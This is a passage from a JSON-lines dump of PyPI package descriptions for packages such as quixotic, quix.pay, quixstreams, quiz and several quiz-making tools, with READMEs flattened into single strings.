The id of each such action\nmust be build using the rule:action_id = prefix + category_id + suffixwhere:category_id:is id of correspondent CMF Action Categoryprefix:defined in DropDownMenu configlet, default value \u2018\u2019suffix:defined in DropDownMenu configlet, default value \u2018_sub\u2019So, the actions structure can look like:+ portal_tabs\n|- home\n|- blog_sub\n|-+ blog\n| |-- 2009\n| |-- 2010By default the root of dropdown menu is \u2018portal_tabs\u2019 category.Menu cachingIf the menu built with Navigation strategy is entirely public it can be cached for\nall users. If Authenticaded users should see some non public items the menu can be\ncached for anonymous only.Caching in case of involving the portal_actions strategy is effective only in case\nif all the action are public and have no extra conditions. In case some conditions\nare applied per action switch off caching.CompatibilityPlone 4.xsample CSS file based on Sunburst theme providedPlone 3.xthe default CSS file has to be overriddenInstallationaddhttp://good-py.appspot.com/release/plone.app.registry/1.0b2to versions in your buildout for Plone<4.1add quintagroup.dropdownmenu to eggs in your buildoutinstall Plone DropDown Menu in Plone via Site Setup -> Add-onsFind more details on the topic inside docs/INSTALL.txtContributorsVolodymyr Cherepanyak [chervol]Vitaliy Podoba [piv]Yuriy Gvozdovych [gvizdyk]Olha Pelishok [olha]Taras Melnychuk [fenix]Roman Kozlovskyi [kroman0]Malthe BorchChangelog1.3.4 - June 09, 2015Fixed mobile dropdown menu [kroman0]1.3.3 - June 09, 2015Cleanup templates [kroman0]Added upgrade step for version 1.3 [kroman0]1.3.2 - June 05, 2015Fixed styled for mobile dropdown [roman.ischiv]1.3.1 - May 25,2015Fixed bug with image directory [roman.ischiv]1.3 - May 22,2015Added js script for mobile dropdown menu [roman.ischiv]1.2.14 - November 18, 2013Deleted unnecessary portal top styles.1.2.13 - July 30, 2013Updated condition for \u2018mobileMenu\u2019 [kroman0]Fixed \u2018item_remote_url\u2019 [kroman0]Updated css media for package [gvizdyk]Hidden mobile menu for print [gvizdyk]Updated styles for mobile navigations [gvizdyk]Updated condition for include styles for mobile device [gvizdyk]Use getRemoteUrl for links [kroman0]The cache key of portal tabs was updated (thanks: richardc).\n[potar]Fixed getting navigation root [kroman0]1.2.12 - April 02, 2013Fixed \u2018no record\u2019 error [kroman0]Added sections heading [kroman0]Fixed empty class attributes [kroman0]Fixed html validation of mobile layout [kroman0]Cleanup templates [kroman0]Wraped mobile menu in div [kroman0]Added ids for navigation [kroman0]1.2.11 - August 10,2012\n \n{% endblock %}contact/success.html:{% extends \"base.html\" %}\n{% block content %}\n

Your message has been sent.

\n{% endblock %}contact/email.txt:From: {{ name }} {{ email }}\n\n{{ message }}\n\n---\nThis message was sent via the website contact form.SettingsThe following settings can be set insettings.pyfor the contact form. OnlyCONTACT_EMAILSis required, which is a tuple or list of email addresses to\nwhich the contact form should be sent.SettingDefaultRequiredCONTACT_EMAILSYesCONTACT_FORM_CLASS\"quix.django.contact.forms.ContactForm\"NoCONTACT_FORM_TEMPLATE\"contact/form.html\"NoCONTACT_SUCCESS_TEMPLATE\"contact/success.html\"NoCONTACT_EMAIL_TEMPLATE\"contact/email.txt\"No"} +{"package": "quixotic", "pacakge-description": "Welcome to QuixoticWhat is Quixotic?Quixotic is a Python library for simple-to-use, low-code quantum computing.FeaturesEasy-to-apply quantum algorithms for a number of combinatorial optimization problems usingQuantum AnnealingandQAOA.Includes out-of-the-box support for various optimization problems like maximum clique and minimum vertex cover.Supports custom problem formulations asQUBOs.Simple-to-use execution of algorithms using both local simulation on your laptop and managed quantum computers onAmazon Braketor the D-Wave LEAP service.Quantum is Optional: serves as a general-purpose optimization library allowing you to solve problems on your laptop using simulated annealing and exact solversInstallpip install -U pippip install quixoticNOTE: Python version>= 3.7is required.Usage Example: Find Maximum Clique in a Graph# construct or load your input graphimportnetworkxasnxseed=1967g=nx.erdos_renyi_graph(6,p=0.5,seed=seed)positions=nx.spring_layout(g,seed=seed)nx.draw(g,with_labels=True,pos=positions)# approximate a solution using QuantumAnnealer and extract resultsfromquixotic.coreimportQuantumAnnealerqo=QuantumAnnealer(g,task='maximum_clique').execute()nodes=qo.results()Executing locally.# plot nodes comprising the solutionsub=g.subgraph(nodes)nx.draw(g,pos=positions,with_labels=True)nx.draw(sub,pos=positions,node_color=\"r\",edge_color=\"r\")How to Execute on a Quantum Computer:By default,Quixoticuses a local solver or simulator (e.g., quantum simulator, simulated annealing), which allows you to easily run and test on your CPU-based laptop. To run on an actual managed quantum computer hosted on Amazon Braket, simply set the backend toawsand supply thedevice_arnands3_folderparameters. Here is an example of using theQuantumAnnealeron a quantum computer managed by Amazon Braket:fromquixotic.coreimportQuantumAnnealerqo=QuantumAnnealer(g,task='maximum_clique',backend='aws',# Amazon AWS as backenddevice_arn='arn:aws:braket:::device/qpu/d-wave/DW_2000Q_6',# D-Wave QPUs3_folder=(\"amazon-braket-Your-Bucket-Name\",\"Your-Folder-Name\"))qo.execute()# executes algorithm on quantum hardware managed by Amazon Braketsolution_nodes=qo.results()For theQuantumAnnealer, you can alternatively use D-Wave LEAP as a backend by specifyingbackend='dwave'. However, to use a managed quantum computer, you'll need to first create an account with one of the backend providers using the instructions below:Setting up an Amazon Braket AccountCreate an AWS account and activateAmazon Braket.During the onboarding process in the previous step, you will generate an Amazon Braket bucket of the formamazon-braket-XXXXXX. Make note of this.If runningQuixoticon your laptop and using a remote quantum device, you'll have toconfigure and store your AWS credentials locally. 
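To make the settings table above concrete, here is a minimal sketch of the corresponding settings.py entries. Only CONTACT_EMAILS is required; the remaining lines simply restate the documented defaults, and the email address is a placeholder:

```python
# settings.py (sketch)
CONTACT_EMAILS = ["webmaster@example.com"]  # required: where submissions are sent (placeholder address)

# Optional overrides -- the values below are just the documented defaults
CONTACT_FORM_CLASS = "quix.django.contact.forms.ContactForm"
CONTACT_FORM_TEMPLATE = "contact/form.html"
CONTACT_SUCCESS_TEMPLATE = "contact/success.html"
CONTACT_EMAIL_TEMPLATE = "contact/email.txt"
```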
If using a managed notebook within Amazon Braket itself, you can skip this step.Setbackend='aws'in addition to thedevice_arnands3_folderparameters when executing either theQuantumAnnealeror theQAOAalgorithm, as shown above.Setting up a D-Wave LEAP AccountTheQuantumAnnealercan also use D-Wave LEAP as a backend instead of Amazon Braket, if following the steps below. (LEAP is D-Wave's cloud-based quantum service.)Create a LEAP account and make note of the API Token assigned to you.AfterQuixoticis installed, run the command:dwave config create. Copy and paste your API token when prompted and select defaults for everything else.When usingQuantumAnnealerinQuixotic, setbackend='dwave'and run the code below to use the default solver:# Executing on D-Wave quantum backendfromquixotic.coreimportQuantumAnnealersolution_nodes=QuantumAnnealer(g,task='maximum_clique',backend='dwave').execute().results()"} +{"package": "quix.pay", "pacakge-description": "Copyright (c) 2010, 2011 Quixotix Software, LLC\nAll Rights Reserved.Quixotix Payment is a set of classes for abstract interfacing with online\npayment gateways used to process credit card transactions.Supported GatewaysAuthorize.NET AIM -http://www.authorize.netPSiGate XML Messenger -http://www.psigate.comQuantam Gateway Authorize.Net Emulation -http://www.quantamgateway.comInstallationeasy_install quix.payExample UsageSimple authorize request using Authorize.NET in test mode:from quix.pay.transaction import CreditCard\nfrom quix.pay.gateway.authorizenet import AimGateway\n\ncard = CreditCard(\n number = '4111111111111111',\n month = '10',\n year = '2020',\n first_name = 'John',\n last_name = 'Doe',\n code = '123'\n)\n\ngateway = AimGateway('YOUR API LOGIN', 'YOUR API PASSWORD')\ngateway.use_test_mode = True\ngateway.use_test_url = True\nresponse = gateway.authorize(1, card)\n\nprint \"Authorize Request: %s\" % gateway.get_last_request().url\nprint \"Transaction %s = %s: %s\" % (response.trans_id,\n response.status_strings[response.status],\n response.message)The author has posted an article on using quix.pay with the Authroize.Net AIM\ngateway on his blog:http://www.micahcarrick.com/python-authorize-net-payment-gateway.html"} +{"package": "quixstreams", "pacakge-description": "Quix Streams v2Quix Streams v2 is a cloud native library for processing data in Kafka using pure Python. 
It\u2019s designed to give you the power of a distributed system in a lightweight library by combining the low-level scalability and resiliency features of Kafka with an easy to use Python interface.Quix Streams has the following benefits:No JVM, no orchestrator, no server-side engine.Easily integrates with the entire Python ecosystem (pandas, scikit-learn, TensorFlow, PyTorch etc).Support for many serialization formats, including JSON (and Quix-specific).Support for stateful operations using RocksDB.Support for aggregations over tumbling and hopping time windowsA simple framework with Pandas-like interface to ease newcomers to streaming.\"At-least-once\" Kafka processing guarantees.Designed to run and scale resiliently via container orchestration (like Kubernetes).Easily runs locally and in Jupyter Notebook for convenient development and debugging.Seamless integration with the Quix platform.Use Quix Streams to build event-driven, machine learning/AI or physics-based applications that depend on real-time data from Kafka.Getting started \ud83c\udfc4Install Quix Streamspython-mpipinstallquixstreamsRequirementsPython 3.8+, Apache Kafka 0.10+Seerequirements.txtfor the full list of requirementsExample ApplicationHere's an example of how toprocessdata from a Kafka Topic with Quix Streams:fromquixstreamsimportApplication,State# Define an applicationapp=Application(broker_address=\"localhost:9092\",# Kafka broker addressconsumer_group=\"consumer-group-name\",# Kafka consumer group)# Define the input and output topics. By default, \"json\" serialization will be usedinput_topic=app.topic(\"my_input_topic\")output_topic=app.topic(\"my_output_topic\")defcount(data:dict,state:State):# Get a value from state for the current Kafka message keytotal=state.get('total',default=0)total+=1# Set a value back to the statestate.set('total',total)# Update your message data with a value from the statedata['total']=total# Create a StreamingDataFrame instance# StreamingDataFrame is a primary interface to define the message processing pipelinesdf=app.dataframe(topic=input_topic)# Print the incoming messagessdf=sdf.update(lambdavalue:print('Received a message:',value))# Select fields from incoming messagessdf=sdf[[\"field_1\",\"field_2\",\"field_3\"]]# Filter only messages with \"field_0\" > 10 and \"field_2\" != \"test\"sdf=sdf[(sdf[\"field_1\"]>10)&(sdf[\"field_2\"]!=\"test\")]# Filter messages using custom functionssdf=sdf[sdf.apply(lambdavalue:0<(value['field_1']+value['field_3'])<1000)]# Generate a new value based on the current onesdf=sdf.apply(lambdavalue:{**value,'new_field':'new_value'})# Update a value based on the entire message contentsdf['field_4']=sdf.apply(lambdavalue:value['field_1']+value['field_3'])# Use a stateful function to persist data to the state store and update the value in placesdf=sdf.update(count,stateful=True)# Print the result before producing itsdf=sdf.update(lambdavalue,ctx:print('Producing a message:',value))# Produce the result to the output topicsdf=sdf.to_topic(output_topic)if__name__==\"__main__\":# Run the streaming applicationapp.run(sdf)How It WorksThere are two primary components:StreamingDataFrame- a predefined declarative pipeline to process and transform incoming messages.Application- to manage the Kafka-related setup & teardown and message lifecycle (consuming, committing). 
It processes each message with the dataframe you provide it.Under the hood, theApplicationwill:Consume a message.Deserialize it.Process it with yourStreamingDataFrame.Produce it to the output topic.Automatically commit the topic offset and state updates after the message is processed.React to Kafka rebalancing updates and manage the topic partitions.Manage the State store.Handle OS signals and gracefully exit the application.More ExamplesYou may find more examples in theexamplesfolderhere.Advanced UsageFor more in-depth description of Quix Streams components, please\nfollow these links:StreamingDataFrame.Serialization.Stateful Processing.Usage with Quix SaaS Platform.Upgrading from Quix Streams <2.0.Using theQuix Platform-Application.Quix()This library doesn't have any dependency on any commercial products, but if you use it together with Quix SaaS Platform you will get some advantages out of the box during your development process such as:Auto-configuration.Monitoring.Data explorer.Data persistence.Pipeline visualization.Metrics.and more.Quix Streams provides a seamless integration with Quix Platform viaApplication.Quix()class.\nThis class will automatically configure the Application using Quix SDK Token.If you are running this within the Quix platform it will be configured\nautomatically.Otherwise, please seeQuix Platform Configuration.What's NextThis library is being actively developed.Here are some of the planned improvements:Windowed aggregations over Tumbling & Hopping windowsState recovery based on Kafka changelog topicsWindowed aggregations over Sliding windowsGroup-bys and joins (for merging topics/keys)Support for \"exactly-once\" Kafka processing (aka transactions)Support for Avro and Protobuf formatsSchema Registry supportTo find out when the next version is ready, make sure you watch this repo\nand join ourQuix Community on Slack!Contribution GuideContributing is a great way to learn and we especially welcome those who haven't contributed to an OSS project before.We're very open to any feedback or code contributions to this OSS project \u2764\ufe0f.Before contributing, please read ourContributingfile for how you can best give feedback and contribute.Need help?If you run into any problems, please create anissueor ask in #quix-help in ourQuix Community on Slack.Community \ud83d\udc6dJoin other software engineers inThe Stream, an online community of people interested in all things data streaming. This is a space to both listen to and share learnings.\ud83d\ude4cJoin our Slack community!LicenseQuix Streams is licensed under the Apache 2.0 license. View a copy of the License filehere.Stay in touch \ud83d\udc4bYou can follow us onTwitterandLinkedinwhere we share our latest tutorials, forthcoming community events and the occasional meme.If you have any questions or feedback - write to us atsupport@quix.io!"} +{"package": "quiz", "pacakge-description": "Capable GraphQL client for Python.Features:Sync/async compatible, pluggable HTTP clients.Auto-generate typed and documented python APIsORM-like syntax to write GraphQL.Note that this project is in an early alpha stage.\nSome features are not yet implemented (see the roadmap below),\nand it may be a little rough around the edges.\nIf you encounter a problem or have a feature request,\ndon\u2019t hesitate to open an issue in theissue tracker.QuickstartA quick \u2018n dirty request to GitHub\u2019s new V4 API:>>>importquiz>>>query='''\n... {\n... repository(owner: \"octocat\", name: \"Hello-World\") {\n... createdAt\n... description\n... 
}\n... }\n... '''>>>quiz.execute(query,url='https://api.github.com/graphql',...auth=('me','password')){\"repository\":...}FeaturesAdaptability. Built on top ofsnug,\nquiz supports different HTTP clientsimportrequestsresult=quiz.execute(query,...,client=requests.Session())as well as async execution\n(optionally withaiohttp):result=awaitquiz.execute_async(query,...)Typing.\nConvert a GraphQL schema into documented python classes:>>>schema=quiz.Schema.from_url('https://api.github.com/graphql',...auth=('me','password'))>>>help(schema.Repository)classRepository(Node,ProjectOwner,Subscribable,Starrable,UniformResourceLocatable,RepositoryInfo,quiz.types.Object)|Arepositorycontainsthecontentforaproject.||Methodresolutionorder:|...||Datadescriptorsdefinedhere:||assignableUsers|:UserConnection|Alistofusersthatcanbeassignedtoissuesinthisrepo||codeOfConduct|:CodeOfConductorNone|Returnsthecodeofconductforthisrepository...GraphQL \u201cORM\u201d. Write queries as you would with an ORM:>>>_=quiz.SELECTOR>>>query=schema.query[..._....repository(owner='octocat',name='Hello-World')[..._....createdAt....description...]...]>>>str(query)query{repository(owner:\"octocat\",name:\"Hello-World\"){createdAtdescription}}Offline query validation. Use the schema to catch errors quickly:>>>schema.query[..._....repository(owner='octocat',name='Hello-World')[..._....createdAt....foo....description...]...]SelectionError:SelectionErroron\"Query\"atpath\"repository\":SelectionError:SelectionErroron\"Repository\"atpath\"foo\":NoSuchField:fielddoesnotexistDeserialization into python objects. Responses are loaded into the schema\u2019s types.\nUse.to access fields:>>>r=quiz.execute(query,...)>>>r.repository.description\"My first repository on GitHub!\">>>isinstance(r.repository,schema.Repository)TrueIf you prefer the raw JSON response, you can always do:>>>quiz.execute(str(query),...){\"repository\":...}Installationquizand its dependencies are pure python. Installation is easy as:pipinstallquizContributingAfter you\u2019ve cloned the repo locally, set up the development environment\nwith:makeinitFor quick test runs, run:pytestTo run all tests and checks on various python versions, run:maketestGenerate the docs with:makedocsPull requests welcome!Preliminary roadmapFeaturestatusInput objectsplannedbetter query validation errorsplannedmore examples in docsplannedexecuting selection sets directlyplannedintrospection fields (i.e.__typename)plannedcustom scalars for existing types (e.g.datetime)plannedimprove Object/Interface APIplannedvalue object docsplannedMutations & subscriptionsplannedInline fragmentsplannedFragments and fragment spreadsplannedpy2 unicode robustnessplannedMixing in raw GraphQLplannedModule autogenerationplannedType inference (e.g. 
enum values)plannedVariablesplannedDirectivesplannedInteger 32-bit limitplannedconverting names from camelcase to snake-caseideaAutogenerate module .rst from schemaideaAutogenerate module .py from schemaideaEscaping python keywordsideaHandling markdown in descriptionsideaWarnings when using deprecated fieldsideaHandle optional types descriptions in schemaideaReturning multiple validation errors at the same timeideaExplicit orderingidea"} +{"package": "quizapi", "pacakge-description": "QuizAPIA wrapper around theQuizAPIapi\ndesigned for an object oriented usage, with great type supportFeatures100% typehinted codebaseExcellent autocompletion and editor supportFully testedBlocking and Async (thanks toinstant-api-client)"} +{"package": "quizapp", "pacakge-description": "QuizappThe quizzing app is an interactive application that enables teachers to create and manage quizzes, and students to take each quiz. Each quiz must be multiple choice and contain a single answer. Upon quiz completion, students can view their quiz score and score averaged across all quizzes. Teachers can view all student quiz scores. Some features of quizapp include:The student selecting which course they want to take a quiz for.Saving the students score for each quiz and storing in a file for a given course.Outputting the student's average quiz score of all quizzes taken by a given student to the screen.Teachers can create new quizzes.Teachers can view and modify student quiz scores.Teachers can calculate and display overall quiz statistics for any courseProject StructureMain package name isquizapp. It contains amain.pymodule and two sub-packages:studentandteacher. The student sub-package contains two modules:readquiz.pyandtakequiz.py. The teacher sub-package contains two modules:createquiz.pyandcheckstudentscores.py. There is an assets directory which contains data files for quizzes and scores.student sub-packageThe student sub-package contains two modules to handle the flows that a student user will interact with:readquiz.py:This module involves reading individual quizzes, enabling student users to complete them. This is accomplished with 2 classes and 4 functions:class Quiz:This consists of a quiz object with three attributes, thename(i.e. course code) of a quiz, the individualproblemsin a quiz, and the totalnumber of problems.class Problem:This consists of a problem object with three attributes, thequestionitself, the multiple choiceoptionsfor a question, and theanswer.read_quiz():Individual quizzes stored as json files are outputted to the screenget_available_courses():Lists all available quizzes students can takesave_score():Saves the score a student achieved into a csv file of student quiz scoresget_percentage():Converts a students quiz score into a percentage.takequiz.py:This module handles the flow of student users taking quizzes. This is accomplished with 1 classes and 3 functions:class Student:This consists of a student object with two attributes,student nameandstudent numberstudent_handler():Initializes a student's name and number into a Student class objectstart_quiz():The function where a student actually completes the quizselect_quiz():Displays all available quizzes then prompts a student to select a quiz to complete.teacher sub-packageThe teacher sub-package contains module to handle the flows that a user with teacher role will interact with. 
It contains two modules:createquiz.py:This module handles the workflow of creating a quiz through an interactive menu through which a teacher can add a quiz for a course. It achieves this using the following methods:create_quiz():This serves as a driver function to create a quiz and then writes the quiz into a JSON file in the appropriate directory with the appropriate filename.questionInput():Takes the user input for questions, options and the answer and creates an object for the same.create_score_csv():Creates a template score file whenever a new quiz is added. After each student has taken the quiz, their score is saved to the file created using this method.convert_to_json():Converts the quiz from a dictionary object to JSON object and writes object into a JSON file.checkstudentscores.py:This module handles the workflow of viewing the scores for the quiz by the teacher and also allows them to view other statistics like mean, minimum, maximum etc. It achieves this using the following methods:get_student_scores():It displays the student's quiz score for a course by taking student number and course code as arguments.set_student_scores():It modifies the student's score if there is an error in the quiz.quiz_score_statistics():It calculates and display metrics like average, minimum, maximum etc. for the course grade of all students.score_driver():This is the driver method allowing the teacher to view a students mark, modify a students mark, calculate quiz summary statistics, or leave the program.quiz_or_score():This is the driver method directing teacher to create a quiz, check quiz score marks, or leave the program"} +{"package": "quiz-bots", "pacakge-description": "Bots for quizDescriptionThis repository contains Vk and TG bots for the quiz. They get used to the questions and check the correctness of the answers to them.Bot examples:Tg botVk bot- write a message \"\u041d\u043e\u0432\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441\" to the groupTable of contentInstallationHow to useLicenseProject goalInstallationInstall usingpip:pipinstallquiz-botsCreate a bot in Telegram viaBotFather, and get it API token.Create redis account inRedislabs, and after that createcloud database(you can choose free plan).\nGet your endpoint database url and port.Create VK's group, allow it send messages, and get access token for it.Register environment variables in the operating system:exportTELEGRAM_TOKEN=telegram_tokenexportDB_ENDPOINT=redisendpointexportDB_PASSWORD=redis_passwordexportVK_GROUP_TOKEN=token_vkontaktePut the question files in a folder(sample files are in the repository folderquiz_files_example) and export quiz content to Redis:quiz-botsexport_quiz_content[path_to_questions_folder]How to useRun TG bot:quiz-botstg-botRun VK bot:quiz-botsvk-botLicenseThis project is licensed under the MIT License - see theLICENSE.mdfile for detailsProject GoalThe code is written for educational purposes on online-course for\nweb-developersdvmn.org."} +{"package": "quizdown", "pacakge-description": "quizdownMarkdown, but for creating multiple-choice quizzes. Especially helpful if you routinely want syntax-highlighting in your question, answers, or distractors.Try alive version (beta)on my website.Off-line Quick-StartInstall (from PyPI)Maybe in a virtualenv? 
This may need to bepip3.pipinstallquizdownPreview a Markdown file in the browser.python-mquizdown01_syllabus.md--output01_syllabus.html--browserExport to Moodle:# Use the .moodle extensionpython-mquizdown01_syllabus.md--output01_syllabus.moodle# If you'd rather .xml:python-mquizdown01_syllabus.md--format=moodle--output01_syllabus.xmlMore options:python -m quizdown --help\nusage: quizdown MARKDOWN_FILE --output (out.moodle|preview.html)\n\npositional arguments:\n INPUT_FILE Markdown file containing quiz questions.\n\noptional arguments:\n -h, --help show this help message and exit\n --output OUTPUT_FILE Where to save the processed output: a .moodle or .html\n extension.\n --format {HtmlSnippet,HtmlFull,MoodleXml}\n Output format, if we cannot figure out from file\n extension.\n --name QUIZ_NAME This is the name of the quiz or question category upon\n import. INPUT_FILE if not defined.\n --theme SYNTAX_THEME Syntax highlighting-theme; default=InspiredGitHub\n {'Solarized (dark)', 'base16-ocean.light',\n 'base16-ocean.dark', 'base16-eighties.dark',\n 'Solarized (light)', 'InspiredGitHub',\n 'base16-mocha.dark'} available.\n --lang LANG Language string to assume for syntax-highlighting of\n un-marked code blocks; default='text'; try 'python' or\n 'java'.\n --browser Directly open a preview in the default web-browser.What isquizdown?This is a tool for quickly specifying 5-20 multiple choice questions in a markdown subset. Right now you can export to both MoodleXML and HTML.Why would I use this over Moodle's built-in editor?Less clicks! Make as many questions as you want with just your keyboard. Then import them in bulk to a \"Question Bank\" and then from there to a new \"Quiz\".You teach CS/Data Science/STEM and you want or NEED somegoodsyntax highlighting for your class.Sane defaults: all questions are \"select as many as apply\", with no partial credit.LimitationsONLY Multiple choice questions are supported.Any partial credit must be done post-export via Moodle.No way to upload images. You could theoretically embed SVG and base64 images but I haven't looked into it.Error messages are limited (I just figured out how to get position information from the markdown library; need to sprinkle it through). For now, treat it like LaTeX: binary search for your errors ;pRoadmapOther question types, e.g., Essay questions? #1Better error messages. (No line/col or question # information right now) #2QTI/Blackboard export support. #3File an issue:https://github.com/jjfiv/quizdown/issuesHow to write a bunch of questions (in words):Use headings (whatever level you want; be consistent) to separate questions.Questions end with a github-style task list -- if you want moodle to shuffle, use unordered lists, otherwise make them ordered.Tasks marked as \"complete\" are correct answers.We're building onpulldown_cmark; a CommonMark-compatible markdown implementation with the \"github tables\" \"github task lists\" and \"strikethrough\" extensions.ExampleSource QuestionLet's imagine we're teaching Python and want to make sure students (A) understand list-append, and (B) remember that lists should never be used as default arguments.### A. Python Lists\n\n```python\nxs = [1,2,3]\nxs.append(7)\nprint(sum(xs))\n```\n\nWhat gets printed?\n\n1. [ ] It's impossible to know.\n1. [x] 13\n1. [ ] Something else.\n\n\n### B. Python Lists and Default Arguments\n\n```python\ndef take_default_list(xs = []):\n xs.append(7)\n return sum(xs)\n```\n\nWhat is the output of ``take_default_list([1,2,3])``?\n\n1. 
[x] It's impossible to know.\n1. [ ] 13\n1. [ ] Something else.Example (rendered)I have a private github repo for each class, with files labeled by lecture number and topic, e.g.,05_Lists.md-- Any old Markdown renderer is close enough for 99% of questions.Here's someone's README.md rendering of the above example questions.A. Python Listsxs=[1,2,3]xs.append(7)print(sum(xs))What gets printed?It's impossible to know.13Something else.B. Python Lists and Default Argumentsdeftake_default_list(xs=[]):xs.append(7)returnsum(xs)What is the output oftake_default_list([1,2,3])?It's impossible to know.13Something else.Why'd you write this in Rust?Because my first version (in Python w/BeautifulSoup) was a bit of a disaster, maintenance-wise. Also, I wanted to have the ability to host an editor online. So this one compiles to WASM."} +{"package": "quizdrill", "pacakge-description": "A learning-by-testing program to learn quickly, mostly memorizingtasks like vocabulary. Quizdrill supports multiple choice, simple\nquiz as well as flashcard testing. Although still quite primitive\nQuizdrill asks questions which have been answered right more often\nthen others more often to improve learning efficiency. Quizzes can\nbe easily created by edition simple text files or automatically built\nfrom Infobox-style templates of Wikipedia dumps (or other MediaWikis\nand even Semantic MediaWikis)."} +{"package": "quizicist", "pacakge-description": "No description available on PyPI."} +{"package": "quizify", "pacakge-description": "Quizify - A Quiz AppDescriptionThis is a cli quiz app that allows users to take a quiz and assess their knowledge on a particular topic.\nIt reads questions from csv files and presents them to the user. The user can then select an answer.\nAt the end of the quiz, the user is presented with their score.RequirementsPython 3.10 or higherInstallationOption 1Clone the repo:git clone https://github.com/Kamran151199/quizify.gitNavigate to the project directory:cd quizifyRunpoetry installto install dependenciesRunpoetry run quizifyto start the appOption 2Install from PyPi:pip install quizifyRunquizifyto start the appRunquizify --helpto see available optionsSchema of CSV filesQuestionsThe questions csv file should have the following columns:question: The question to be askedanswer: The correct answer to the questionoptions: The options separated by;(semi-colon)level: Any meta data that you want to show to the user after the question has been answeredScore PenaltyThe score penalty csv file should have the following columns:level: The level of the questionpenalty: The penalty to be applied to the score if the question is answered incorrectlyExample CSV filesquestions.csvscore_penalty_config.csvExample Usagequizify --helpto see available optionsquizify --score-penalty=score_penalty_config.csv --questions=questions.csvto start the app with custom config\nand questions.quizify --score-penalty=score_penalty_config.csv --questions=questions.csv --shuffleto start the app with custom\nconfig\nand questions and shuffle the questions.quizify --score-penalty=score_penalty_config.csv --questions=questions.csv --shuffle --with-metato start the app\nwith custom config\nand questions and shuffle the questions and show meta data."} +{"package": "quizii1", "pacakge-description": "quizzquizzz\u10db\u10dc\u10d8\u10e8\u10d5\u10dc\u10d4\u10da\u10dd\u10d1\u10d8\u10e1 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e2\u10d0\u10dc\u10d0\u10d3 \u10e3\u10dc\u10d3\u10d0 \u10d2\u10d0\u10db\u10dd\u10d5\u10d8\u10eb\u10d0\u10ee\u10dd\u10d7 
fib_next \u10ea\u10d5\u10da\u10d0\u10d3\u10d8, print \u10d0\u10e0 \u10e1\u10ed\u10d8\u10e0\u10d3\u10d4\u10d1\u10d0."} +{"package": "quizium-prompt", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quizler", "pacakge-description": "No description available on PyPI."} +{"package": "quizlet-sets", "pacakge-description": "quizlet-sets - A library to download Quizlet study setsUsage:Install it useingpip3 install quizlet-sets. [WIP, only have example code]fromquizlet_setsimportsetsURL=\"https://quizlet.com/686459638/test-set-flash-cards/?new\"# Sample study setset=sets.get_terms(URL)# Returns a TermList objectname=\"Sample set\"# There are a few different ways to export study sets.set.txt(name)set.xls(name)set.csv(name)set.anki(name,\"deck name\")"} +{"package": "quizlet-sets-ashton0223", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quizli", "pacakge-description": "An educational project teaching how to open-source an interactive Python quiz appquizliProject StatsDocumentationBuild statusActivity & Issue TrackingPyPINews & UpdatesDemo:mortar_board: Learning GuideThis guide teaches you how to effectively share a Python app with the open-source community.Learning GuideInteractive quiz appHow to create an interactive Python quiz app?Command Line InterfaceHow to add a CLI to your quiz app?DocumentationHow to create a slick documentation for your app?PublishingHow to build, manage and publish your Python package to PyPi?TestingHow to test your app?:rocket: User GuideThis guide contains usage and reference material for thequizliapp.User GuideCLI ReferenceUsage & reference forquizli'sCLICode ReferenceUsage & reference forquizli'ssource codeQuickstart:package: InstallationInstall quizli withpip:pip install quizli:zap: EntrypointTo get help aboutquizli'scommands open your console and type:quizli --helpThe same works for subcommands, e.g. :quizli demo --help"} +{"package": "quizlight", "pacakge-description": "Quizlight is simple terminal-based program for test taking and creation. It is written in Python 3. It comes with a Python 3 test module, based onThe Python Tutorial.Optionsusage: quizlight.py [-h] [\u2013version] [-d DIRECTORY] [\u2013learn] [file]positional arguments:file set the module import fileoptional arguments:-h,--helpshow this help message and exit--versionshow program\u2019s version number and exit-dDIRECTORYset the module import directory--learnturn on learning mode (immediate answer feedback)InterfaceQuizlight has a menu driven interface, based on the lightcli library. There are two modes: test mode, and edit mode. Test mode is for taking tests. 
Edit mode is for creating and editing tests.LinksDocumentationChangelog"} +{"package": "quizmake", "pacakge-description": "A question generator I made for the University of Guelph.Despite developing this for Moodle, it should support anything that can take its export formats.Questions are randomized from token files that are called dynamically by the user.The user scripts the questions using a simple three-part file format to be covered later.https://github.com/alvations/QuotablesInstallationIf you usepip3, you can install it by doing>>> pip3 install quizmakeAlternatively, you may install this repo locally by cloning it and running>>> pip3 install -e .InformationPyPi:https://pypi.org/project/quizmake/Github:https://github.com/jnguyen1098License: MIT LicenseHeaderLorem ipsumdolor sitamet.Lorem ipsumdolor sit ametLorem ipsumdolor sit ametgoogleverbatimTitlesubtitlesubsubtitleLmaoIf under and overline are used, their length must be identical# with overline, for partswith overline, for chapters=, for sections-, for subsections^, for subsubsections\u201c, for paragraphsThis is a bulleted list.It has two items, the second\nitem uses two lines. (note the indentation)This is a numbered listIt also has two itemsThis is also a numbered listBut it doesn\u2019t use explicit numberingCode block testlmao\nfor (int i = 0; i < 10; i++) {\n puts(\"lmao\");\n}Also a test>>> TestWhat your project doesHow to install itExample usageHow to set up the dev. environmentHow to ship a changeChangelogLicense inforaw.githubusercontent.com/dbader/readme-template/master/README.md"} +{"package": "quiz-maker", "pacakge-description": "No description available on PyPI."} +{"package": "quizmaker3000", "pacakge-description": "No description available on PyPI."} +{"package": "quizofit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quiz-publish", "pacakge-description": "No description available on PyPI."} +{"package": "quizpy", "pacakge-description": "quizpyThis package allows you to create a Moodle Quiz in Python code, which then can be imported via the XML import.Stop fumbling aroundwith the horrible moodle web interface!Start coding and use version control!So far many of the existing question types are supported:Multiple ChoiceMultiple True-FalseNumericalShortAnswerMatchingDrag & Drop on ImagesClozeEssayDescriptionsInstallationQuizpy is available on PyPi and can be installed via pip:pip install quizpyUsageA moodle quiz (more specifically a question catalogue) consists of multiple categories that need to be filled\nwith questions. EachQuestionhas at least a title, a question text and some default points (which can be\nscaled in the actual quiz on moodle). 
